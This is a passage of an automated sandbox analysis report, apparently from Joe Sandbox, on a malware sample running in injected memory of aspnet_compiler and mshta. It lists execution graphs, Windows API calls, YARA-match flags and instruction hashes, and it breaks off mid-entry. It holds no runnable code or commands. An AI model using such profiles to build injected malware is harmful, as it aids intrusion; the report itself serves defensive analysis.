                                                    • Opcode Fuzzy Hash: cbe83da96928bc98881e80b5367dda739ddfcbf6563a71eafdcb07f868115681
                                                    • Instruction Fuzzy Hash: 8BB1272080E7CA0FD747A77898242A67FF1EF47254F1A01EBD48DCB1A3D6199D1AC362
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000003.476592292.0000000003410000.00000010.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_3_3410000_mshta.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction ID: 3c11ade3c719c212124b216596f3dcb6befe21900d30f5e248621ceefe973db6
                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                    • Instruction Fuzzy Hash:

                                                    Execution Graph

                                                    Execution Coverage:1%
                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                    Signature Coverage:7.5%
                                                    Total number of Nodes:93
                                                    Total number of Limit Nodes:8
                                                    execution_graph 77401 424be3 77405 424bfc 77401->77405 77402 424c88 77403 424c47 77409 42e593 77403->77409 77405->77402 77405->77403 77407 424c83 77405->77407 77408 42e593 RtlFreeHeap 77407->77408 77408->77402 77412 42c813 77409->77412 77411 424c53 77413 42c830 77412->77413 77414 42c841 RtlFreeHeap 77413->77414 77414->77411 77415 42f883 77416 42f7f3 77415->77416 77419 42f850 77416->77419 77421 42e673 77416->77421 77418 42f82d 77420 42e593 RtlFreeHeap 77418->77420 77420->77419 77424 42c7c3 77421->77424 77423 42e68e 77423->77418 77425 42c7e0 77424->77425 77426 42c7f1 RtlAllocateHeap 77425->77426 77426->77423 77427 42ba83 77428 42baa0 77427->77428 77431 a6fdc0 LdrInitializeThunk 77428->77431 77429 42bac8 77431->77429 77497 42f753 77498 42f763 77497->77498 77499 42f769 77497->77499 77500 42e673 RtlAllocateHeap 77499->77500 77501 42f78f 77500->77501 77502 424853 77503 42486f 77502->77503 77504 424897 77503->77504 77505 4248ab 77503->77505 77506 42c4a3 NtClose 77504->77506 77507 42c4a3 NtClose 77505->77507 77508 4248a0 77506->77508 77509 4248b4 77507->77509 77512 42e6b3 RtlAllocateHeap 77509->77512 77511 4248bf 77512->77511 77518 413a73 77522 413a93 77518->77522 77520 413afc 77521 413af2 77522->77520 77523 41b263 RtlFreeHeap LdrInitializeThunk 77522->77523 77523->77521 77524 a6f9f0 LdrInitializeThunk 77432 401a0b 77434 4019eb 77432->77434 77433 401a00 77434->77433 77437 42fc23 77434->77437 77440 42e143 77437->77440 77441 42e169 77440->77441 77450 407413 77441->77450 77443 42e17f 77449 401aa8 77443->77449 77453 41af53 77443->77453 77445 42e19e 77446 42c863 ExitProcess 77445->77446 77447 42e1b3 77445->77447 77446->77447 77464 42c863 77447->77464 77452 407420 77450->77452 77467 416293 77450->77467 77452->77443 77454 41af7f 77453->77454 77483 41ae43 77454->77483 77457 41afc4 77461 42c4a3 NtClose 77457->77461 77462 41afe0 77457->77462 77458 41afac 77459 41afb7 77458->77459 77489 42c4a3 77458->77489 77459->77445 77463 41afd6 
77461->77463 77462->77445 77463->77445 77465 42c880 77464->77465 77466 42c891 ExitProcess 77465->77466 77466->77449 77468 4162b0 77467->77468 77470 4162c9 77468->77470 77471 42cf13 77468->77471 77470->77452 77473 42cf2d 77471->77473 77472 42cf5c 77472->77470 77473->77472 77478 42bad3 77473->77478 77476 42e593 RtlFreeHeap 77477 42cfd5 77476->77477 77477->77470 77479 42baed 77478->77479 77482 a6fae8 LdrInitializeThunk 77479->77482 77480 42bb19 77480->77476 77482->77480 77484 41af39 77483->77484 77485 41ae5d 77483->77485 77484->77457 77484->77458 77492 42bb73 77485->77492 77488 42c4a3 NtClose 77488->77484 77490 42c4c0 77489->77490 77491 42c4d1 NtClose 77490->77491 77491->77459 77493 42bb90 77492->77493 77496 a707ac LdrInitializeThunk 77493->77496 77494 41af2d 77494->77488 77496->77494

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 26 42c4a3-42c4df call 404773 call 42d703 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C4DA
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
                                                    • Instruction ID: 33488c65c50e967ce8032212b01be2a4ccc8566337b661b198c809349525c89b
                                                    • Opcode Fuzzy Hash: 0281abc325b70bf167454d393558beda0c7014649f4c41559f3eeee4f3c43d81
                                                    • Instruction Fuzzy Hash: 98E046762002187BD220AA6AEC41F9B776CDFC6724F44441AFA08A7281CBB4BA0186B5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 40 a707ac-a707c1 LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 36 a6f9f0-a6fa05 LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 37 a6fae8-a6fafd LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 38 a6fb68-a6fb7d LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 39 a6fdc0-a6fdd5 LdrInitializeThunk
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 42c813-42c857 call 404773 call 42d703 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C852
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: 'cA
                                                    • API String ID: 3298025750-2370355221
                                                    • Opcode ID: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
                                                    • Instruction ID: 17d5cb76b4341d50fd7aa1bda6014d5d3e310c77e1840313bf8453552cdf047a
                                                    • Opcode Fuzzy Hash: bec87bca31af92aec9494093564906b61a46ba24f88768d571c812d6104144da
                                                    • Instruction Fuzzy Hash: D8E06D712042087BD610EE59DC41F9B33ACEFC9710F404419F908A7241C774B91186B9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 21 42c7c3-42c807 call 404773 call 42d703 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,0041E40E,?,?,00000000,?,0041E40E,?,?,?), ref: 0042C802
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
                                                    • Instruction ID: d9b28d67632644e52be635d512cdd863fcd8cc5184f4de7700c5ec6c30784a09
                                                    • Opcode Fuzzy Hash: 57b2a52395c9222767e05ed8cc01738bdf3033cd1b87f39c2aaa5050d618ec99
                                                    • Instruction Fuzzy Hash: F4E09275354208BBD610EE59DC41FAB37ACEFC5714F00001AF908A7241D770B91087B9

                                                    Control-flow Graph

                                                    control_flow_graph 31 42c863-42c89f call 404773 call 42d703 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNELBASE(?), ref: 0042C89A
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_400000_aspnet_compiler.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: a4d4bde1c41013d22935837f348492cefa208b3edefa264fb9d256cbbf11bae2
                                                    • Instruction ID: f3636df3db5ba9ab49c58778ad6cc278f2ad92603f3ac2d072733826d1314c23
                                                    • Opcode Fuzzy Hash: a4d4bde1c41013d22935837f348492cefa208b3edefa264fb9d256cbbf11bae2
                                                    • Instruction Fuzzy Hash: 17E08C7A200214BBD220FA6AEC42FDBB76DDFC5715F40405AFA08A7281C774BA0087F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [Pj
                                                    • API String ID: 0-2289356113
                                                    • Opcode ID: 88b1481c0890d4ccf6b9aee6a733e627154f3a85f6c371679481d25e8bd3cb73
                                                    • Instruction ID: 5a87116bf2fab3d6c10ac10ef8fca5cb297bb17399bdee1fe53db92739af6a7f
                                                    • Opcode Fuzzy Hash: 88b1481c0890d4ccf6b9aee6a733e627154f3a85f6c371679481d25e8bd3cb73
                                                    • Instruction Fuzzy Hash: ABF06D31208244BBEB229B20CD85F2B7BB9EF95754F158858F9456A0D3CB7288A1E721
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                    • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                    • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                    • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                    • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                    • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                    • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                    • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                    • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                    • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                    • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                    • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                    • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                    Memory Dump Source
                                                    • Source File: 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                    • Associated: 0000001B.00000002.509949677.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B54000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B57000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000001B.00000002.509949677.0000000000BC0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_27_2_a50000_aspnet_compiler.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
